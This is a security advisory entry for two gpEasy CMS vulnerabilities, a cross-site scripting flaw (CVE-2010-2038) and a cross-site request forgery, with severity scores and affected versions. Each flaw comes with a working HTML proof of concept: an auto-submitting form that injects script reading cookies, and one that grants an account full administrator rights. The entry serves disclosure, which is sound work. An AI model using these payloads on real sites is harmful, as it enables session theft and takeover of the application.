2.1 Low
CVSS2
Access Vector
NETWORK
Access Complexity
HIGH
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:H/Au:S/C:N/I:P/A:N
0.001 Low
EPSS
Percentile
50.9%
High-Tech Bridge SA Security Research Lab has discovered two vulnerabilities in gpEasy CMS which could be exploited to perform cross-site scripting and cross-sire request forgery attacks.
Cross-site scripting vulnerability in gpEasy CMS: CVE-2010-2038
The vulnerability exists due to input sanitation error in the HTTP POST parameter " gpcontent" in include/tool/editing_files.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
<form method=“POST” action=“http://example.com/index.php/Home” name=“myfrm”>
<input type=“hidden” name=“cmd” value=‘save’>
<input type=“hidden” name=“gpcontent” value=‘text"><script>alert(document.cookie)</script>’>
</form>
<script>
d ocument.myfrm.submit();</script>
Cross-site request forgery (CSRF) gpEasy CMS
The vulnerability exists due to insufficient validation of the request origin in include/admin/admin_users.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and create account with arbitrary privileges within application. Successful exploitation might result in complete compromise of the application.
Exploitation example:
<form action=“http://example.com/index.php/Admin_Users” method=“post” name=“myfrm”>
<input type=“hidden” name=“cmd” value=“ResetDetails” >
<input type=“hidden” name=“username” value=“editor” >
<input type=“hidden” name=“email” value="[email protected]" >
<input type=“hidden” name=“grant[]” value=“Admin_Menu” >
<input type=“hidden” name=“grant[]” value=“Admin_Uploaded” >
<input type=“hidden” name=“grant[]” value=“Admin_Extra” >
<input type=“hidden” name=“grant[]” value=“Admin_Theme” >
<input type=“hidden” name=“grant[]” value=“Admin_Users” >
<input type=“hidden” name=“grant[]” value=“Admin_Configuration” >
<input type=“hidden” name=“grant[]” value=“Admin_Trash” >
<input type=“hidden” name=“grant[]” value=“Admin_Uninstall” >
<input type=“hidden” name=“grant[]” value=“Admin_Addons” >
<input type=“hidden” name=“grant[]” value=“Admin_New” >
<input type=“hidden” name=“grant[]” value=“Admin_Theme_Content” >
<input type=“hidden” name=“aaa” value=“Continue” >
</form>
<script>
document.myfrm.submit();
</script>
CPE | Name | Operator | Version |
---|---|---|---|
gpeasy cms | le | 1.6.2 |